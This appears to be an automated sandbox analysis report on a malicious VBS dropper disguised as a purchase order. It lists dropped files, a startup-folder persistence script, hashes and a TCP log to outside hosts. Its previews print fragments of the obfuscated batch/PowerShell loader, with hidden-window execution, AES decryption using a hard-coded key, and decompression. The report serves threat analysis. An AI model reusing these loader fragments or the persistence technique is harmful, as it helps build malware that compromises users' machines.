      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:Extensible storage user DataBase, version 0x620, checksum 0xaf3ea1a6, page size 32768, DirtyShutdown, Windows version 10.0
      Category:dropped
      Size (bytes):17301504
      Entropy (8bit):1.0236803944270363
      Encrypted:false
      SSDEEP:6144:rvQtYV7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqkV:eyUt3F0TkT0TAitKxK9JdW54Ago
      MD5:00AB19D242497172EE7B97ABBF7A610D
      SHA1:8C85C0DE464A3505B5F0FA97D00C22008510C73E
      SHA-256:D207A765135312351BB35E995F455678E49FB387373C115943DBB212437097A1
      SHA-512:2BE0AE50FA012152C0A3DD9DB34F60BE9AA91F2EB3F91B2F3E0D6B77E5246C9005DEBD3A724F56D49B1099EB058031BC43EF34F24CA24C6AB8690FF6DED74B08
      Malicious:false
      Preview:.>..... .......4.........gN;....{........................&....../...{..;+...|..h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{....................................\k;+...|.................t87.;+...|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Local\Temp\oaanp

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
      Category:dropped
      Size (bytes):2
      Entropy (8bit):1.0
      Encrypted:false
      SSDEEP:3:Qn:Qn
      MD5:F3B25701FE362EC84616A93A45CE9998
      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
      Malicious:false
      Preview:..

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with very long lines (57944), with CRLF line terminators
      Category:dropped
      Size (bytes):709442
      Entropy (8bit):6.01859378817259
      Encrypted:false
      SSDEEP:12288:BoLStLL5Tn6TNMkmIu9bp0su+RUuEA6krfFD9oVeoNktCY0X:bdTn6TZmN9bhRSAHPoVeoutCYQ
      MD5:4C952AAFB3FA8962A6076784E546700F
      SHA1:62A4423135600B372F326CC0340A1471795ED3B6
      SHA-256:EE72B85C0B4CC07AA9CA84C07F176C520FC50ABA1948B47D3B067541BA216197
      SHA-512:FC29C9A7EFF1A14B46D5FEC0B523D2B223435742DEE168B96822A20965BCD92B0FED9F0C7C0EC99FC0CE43AFD019A91626D0E8DE44A3AFAEDBD14B596924CCEB
      Malicious:true
      Preview:cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls..set "BMBI=Lo"..set "NoPm=nvo"..set "RAtk=lect"..set "wDXk=byp"..set "BabZ=prof"..set "npxxsdQFXszBBuABzmwb=echo cls;powershell "..set "BFYxstiwHkLqdvylpdpK=-w hidden;function d"..set "xkozbSJbcwKpEayIrafY=ecrypt_function($par"..set "UuXNHixgVpmwWLDqqzwA=am_var){.$aes_var=[S"..set "KgtlzvLdXQUpXrPdmBRS=ystem.Security.Crypt"..set "uCfNkotSwhsSDFnNbMnl=ography.Aes]::Create"..set "wuifuXzEWAePHDfhaFbl=();.$aes_var.Mode=[S"..set "cTGQycLsdbcAnFvZuZsm=ystem.Security.Crypt"..set "OOWWcCkZzfMvLbjDOsHs=ography.CipherMode]:"..set "lhBUyEBchgNamOwoWKNV=:CBC;.$aes_var.Paddi"..set "RLSXoGOmwSlbrabHmbxy=ng=[System.Security."..set "bhRtsLiWEVGeFMAzoDFR=Cryptography.Padding"..set "PoFpVMImMObVmoTKTzFC=Mode]::PKCS7;.$aes_v"

      C:\Users\user\AppData\Roaming\dropped.bat

      Download File
      Process:C:\Windows\System32\wscript.exe
      File Type:ASCII text, with very long lines (57944), with CRLF line terminators
      Category:dropped
      Size (bytes):709442
      Entropy (8bit):6.01859378817259
      Encrypted:false
      SSDEEP:12288:BoLStLL5Tn6TNMkmIu9bp0su+RUuEA6krfFD9oVeoNktCY0X:bdTn6TZmN9bhRSAHPoVeoutCYQ
      MD5:4C952AAFB3FA8962A6076784E546700F
      SHA1:62A4423135600B372F326CC0340A1471795ED3B6
      SHA-256:EE72B85C0B4CC07AA9CA84C07F176C520FC50ABA1948B47D3B067541BA216197
      SHA-512:FC29C9A7EFF1A14B46D5FEC0B523D2B223435742DEE168B96822A20965BCD92B0FED9F0C7C0EC99FC0CE43AFD019A91626D0E8DE44A3AFAEDBD14B596924CCEB
      Malicious:true
      Preview:cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls.. cls..set "BMBI=Lo"..set "NoPm=nvo"..set "RAtk=lect"..set "wDXk=byp"..set "BabZ=prof"..set "npxxsdQFXszBBuABzmwb=echo cls;powershell "..set "BFYxstiwHkLqdvylpdpK=-w hidden;function d"..set "xkozbSJbcwKpEayIrafY=ecrypt_function($par"..set "UuXNHixgVpmwWLDqqzwA=am_var){.$aes_var=[S"..set "KgtlzvLdXQUpXrPdmBRS=ystem.Security.Crypt"..set "uCfNkotSwhsSDFnNbMnl=ography.Aes]::Create"..set "wuifuXzEWAePHDfhaFbl=();.$aes_var.Mode=[S"..set "cTGQycLsdbcAnFvZuZsm=ystem.Security.Crypt"..set "OOWWcCkZzfMvLbjDOsHs=ography.CipherMode]:"..set "lhBUyEBchgNamOwoWKNV=:CBC;.$aes_var.Paddi"..set "RLSXoGOmwSlbrabHmbxy=ng=[System.Security."..set "bhRtsLiWEVGeFMAzoDFR=Cryptography.Padding"..set "PoFpVMImMObVmoTKTzFC=Mode]::PKCS7;.$aes_v"

      \Device\ConDrv

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with very long lines (2026), with CRLF line terminators
      Category:dropped
      Size (bytes):2028
      Entropy (8bit):5.571944595796485
      Encrypted:false
      SSDEEP:48:QIJRm8RUYRxSKB3HnqjB3LHzDpOXkHIkMikEcrbhM2a72ut41X1hxhOWYxWwWPCg:JBN7PB3qjBbHVPc+pDmjTczx97PDc
      MD5:B15E6EF34B8CBAB4E4AAF198081F5FD9
      SHA1:12CF72863E5C32908B444464E5B83A1BB745D6F9
      SHA-256:A79E8F50FAF512F094B8CAC7AE02F664907F2D60A5D765E20C0D14C503367F5C
      SHA-512:8F918DC235A06EAA99F53CBCED4B6310CCC7DC765DB568BAF5E888623ABD4773C29FF51F064FB92B96D491F429397EA606FD97D3B47CAA761414DC18C7DE043D
      Malicious:false
      Preview:cls;powershell -w hidden;function decrypt_function($param_var){.$aes_var=[System.Security.Cryptography.Aes]::Create();.$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ=');.$aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw==');.$decryptor_var=$aes_var.CreateDecryptor();.$return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);.$decryptor_var.Dispose();.$aes_var.Dispose();.$return_var;}function decompress_function($param_var){.$cxhgH=New-Object System.IO.MemoryStream(,$param_var);.$XWybH=New-Object System.IO.MemoryStream;.$OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress);.$OXCUo.CopyTo($XWybH);.$OXCUo.Dispose();.$cxhgH.Dispose();.$XWybH.Dispose();.$XWybH.ToArray();}function execute_function($param_var,$param2_var){.$sM

      Static File Info

      General

      File type:ASCII text, with very long lines (65493), with CRLF line terminators
      Entropy (8bit):5.641596450524331
      TrID:
      • Visual Basic Script (13500/0) 100.00%
      File name:PO#2195112.vbs
      File size:947'023 bytes
      MD5:0b3560c39b68490388b08e96e46a1dc6
      SHA1:bf04e9d0e08954027bc797a1d3723026320d4fb9
      SHA256:78d59fb49b75b46fa15aa5b9f9d69f7a83980486f12158783e619169aaac8884
      SHA512:91735fbd835cb639a1b7e8e2f209c6329c117082bd748386c7d7d1ac0e07aa7f60e72f7fdd47aa3c67f5c3e37254fa53b20ce5e1ee3ecfa0411fedce5b8e0c30
      SSDEEP:12288:oZ/XHFELMBg40e3QoEeAk1mcmLanb7Gf1ZhlYe10MzcnKJfZlda4VqegucN:odH+LMqQEedEcMSCmnK/uTN
      TLSH:3D1502148D882FB9DEFC2A1840FE171E53E04A9A550FB94AA773BD4ABFF7504421B1C9
      File Content Preview:Option Explicit....' Base64 encoded bytes..Dim base64Encoded : base64Encoded = "Y2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQogICAgY2xzDQo

      File Icon

      Icon Hash:68d69b8f86ab9a86

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jul 3, 2024 08:43:57.326179028 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:43:57.331064939 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:43:57.331187010 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:43:57.334868908 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:43:57.339674950 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:43:58.575417995 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:43:58.615483999 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:43:58.976906061 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:43:58.981450081 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:43:58.987287998 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:43:58.987349033 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:43:58.992377043 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:44:00.101056099 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:44:00.102632999 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.107784986 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:44:00.600584984 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:44:00.628284931 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.631650925 CEST4971335890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.633260965 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:00.633331060 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.636631012 CEST358904971364.188.16.157192.168.2.6
      Jul 3, 2024 08:44:00.636688948 CEST4971335890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.636754036 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.640048981 CEST4971335890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.641658068 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:00.644119978 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.645745039 CEST358904971364.188.16.157192.168.2.6
      Jul 3, 2024 08:44:00.646662951 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.649025917 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:00.649085045 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.652892113 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:00.657767057 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:01.106277943 CEST4971580192.168.2.6178.237.33.50
      Jul 3, 2024 08:44:01.111299992 CEST8049715178.237.33.50192.168.2.6
      Jul 3, 2024 08:44:01.111416101 CEST4971580192.168.2.6178.237.33.50
      Jul 3, 2024 08:44:01.111507893 CEST4971580192.168.2.6178.237.33.50
      Jul 3, 2024 08:44:01.116466045 CEST8049715178.237.33.50192.168.2.6
      Jul 3, 2024 08:44:01.722057104 CEST8049715178.237.33.50192.168.2.6
      Jul 3, 2024 08:44:01.722115993 CEST4971580192.168.2.6178.237.33.50
      Jul 3, 2024 08:44:01.733398914 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:01.741120100 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:44:01.849020004 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:01.849162102 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:01.859998941 CEST358904971364.188.16.157192.168.2.6
      Jul 3, 2024 08:44:01.896723032 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:01.896792889 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:01.912300110 CEST4971335890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.278882027 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.278903961 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.279032946 CEST358904971364.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.283256054 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.288240910 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.288342953 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.289690018 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.293185949 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.294559956 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.294639111 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.294713020 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.294728041 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.294739008 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.294749975 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.294759989 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.294770956 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.294770956 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.294804096 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.294815063 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.294841051 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.299469948 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.299678087 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.299694061 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.299705982 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.300641060 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.302870035 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.302927971 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.304429054 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.305628061 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.305660009 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.305671930 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.305707932 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.305757046 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.305788994 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.305811882 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.305830956 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.305840015 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.305844069 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.305875063 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.307527065 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.307818890 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.307852030 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.307866096 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.307890892 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.307993889 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.308006048 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.309794903 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.310209036 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.310256958 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.310565948 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.310772896 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.310800076 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.310924053 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.310939074 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.310961008 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.310973883 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312069893 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.312376022 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312546968 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312561035 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312572002 CEST4971335890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.312582016 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312603951 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312691927 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312701941 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312714100 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312722921 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312736034 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312747002 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312767982 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312789917 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.312802076 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.314343929 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.314747095 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.314769030 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.314779997 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315078020 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315093994 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315104008 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315114021 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315133095 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315143108 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315152884 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315164089 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315175056 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315186024 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315207958 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315221071 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.315442085 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.315563917 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.316770077 CEST4971335890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.317042112 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317059040 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317082882 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317091942 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317101002 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317110062 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317150116 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317158937 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317208052 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317217112 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317224979 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317233086 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317250013 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317259073 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.317434072 CEST358904971364.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319545984 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319561005 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319570065 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319578886 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319586992 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319595098 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319603920 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319653988 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319663048 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319672108 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319689035 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319698095 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319705963 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.319715977 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.320288897 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.320319891 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.320328951 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.320414066 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.320522070 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.320532084 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.320540905 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.320928097 CEST358904971464.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.320996046 CEST4971435890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.321805000 CEST358904971364.188.16.157192.168.2.6
      Jul 3, 2024 08:44:02.321857929 CEST4971335890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:02.720252991 CEST8049715178.237.33.50192.168.2.6
      Jul 3, 2024 08:44:02.720360994 CEST4971580192.168.2.6178.237.33.50
      Jul 3, 2024 08:44:03.160811901 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.160836935 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.160847902 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.160870075 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.160972118 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.161128044 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.165853024 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.165901899 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.165911913 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.165981054 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.174299002 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.174348116 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.174359083 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.174366951 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.174407959 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.174436092 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.174499035 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.174510002 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.174545050 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.174578905 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.174628019 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.531081915 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.531111956 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.531121969 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.531193972 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.536295891 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.536370039 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.536381960 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.536392927 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.536422968 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.536479950 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.536554098 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.536595106 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.541456938 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.541475058 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.541486025 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.541527033 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.541552067 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.541589975 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.546389103 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.546437025 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.546447039 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.546502113 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.546849966 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.546864033 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.546878099 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.546895027 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.546916962 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.549729109 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.549745083 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.549757004 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.549791098 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.549793005 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.549834013 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.589339972 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.589370012 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.589386940 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.589399099 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:03.589565992 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:03.589565992 CEST4971235890192.168.2.664.188.16.157
